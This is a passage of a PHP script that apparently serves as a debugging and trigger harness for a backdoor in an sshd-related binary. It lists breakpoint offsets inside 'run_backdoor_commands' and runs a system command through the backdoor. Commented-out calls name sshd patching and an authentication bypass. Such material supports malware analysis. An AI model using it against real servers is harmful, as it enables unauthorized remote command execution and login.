    $run_backdoor_commands+0xB6B, $run_backdoor_commands+0xB7F, $run_backdoor_commands+0xB8B, $run_backdoor_commands+0xB99,
    $run_backdoor_commands+0xBD1, $run_backdoor_commands+0xC2B, $run_backdoor_commands+0xC50, $run_backdoor_commands+0xC6C,
    $run_backdoor_commands+0xD00
];
$jmp_disable_backdoor = [
    $run_backdoor_commands+0xBB, $run_backdoor_commands+0xCA, $run_backdoor_commands+0xD7, $run_backdoor_commands+0xE4,
    $run_backdoor_commands+0xF1, $run_backdoor_commands+0x105, $run_backdoor_commands+0x127, $run_backdoor_commands+0x139,
    $run_backdoor_commands+0x184, $run_backdoor_commands+0x18F, $run_backdoor_commands+0x19A, $run_backdoor_commands+0x1A5,
    $run_backdoor_commands+0x1B6, $run_backdoor_commands+0x1E1, $run_backdoor_commands+0x20B, $run_backdoor_commands+0x255,
    $run_backdoor_commands+0x260, $run_backdoor_commands+0x26B, $run_backdoor_commands+0x27E, $run_backdoor_commands+0x29A,
    $run_backdoor_commands+0x2F6, $run_backdoor_commands+0x320, $run_backdoor_commands+0x354, $run_backdoor_commands+0x3CB,
    $run_backdoor_commands+0x3D8, $run_backdoor_commands+0x3E1, $run_backdoor_commands+0x3EB, $run_backdoor_commands+0x401,
    $run_backdoor_commands+0x41F, $run_backdoor_commands+0x434, $run_backdoor_commands+0x451, $run_backdoor_commands+0x46F,
    $run_backdoor_commands+0x4E5, $run_backdoor_commands+0x501, $run_backdoor_commands+0x510, $run_backdoor_commands+0x532,
    $run_backdoor_commands+0x53F, $run_backdoor_commands+0x556, $run_backdoor_commands+0x563, $run_backdoor_commands+0x570,
    $run_backdoor_commands+0x5E9
];
$jmp_exit = [
    $run_backdoor_commands+0x143, $run_backdoor_commands+0x152,
    $run_backdoor_commands+0x161, $run_backdoor_commands+0x177,
    $run_backdoor_commands+0xD3E, $run_backdoor_commands+0xD75,
];
$breakpoints = array_unique([...$jmp_bad_data, ...$jmp_disable_backdoor, ...$jmp_exit]);
//$invoker->debug_place_breakpoints(...$breakpoints);
//$invoker->debug_place_breakpoints();
//$invoker->debug_place_breakpoints(0x993C);
//$invoker->debug_place_breakpoints(0xA189);

/*
print(" ... running system command ...\n");
$invoker->cmd_system('id');

print(" ... patching sshd variables ...\n");
$invoker->cmd_patch_sshd();
print(" done!\n");
*/

$invoker->cmd_system('id');
//$invoker->cmd_bypass_auth();
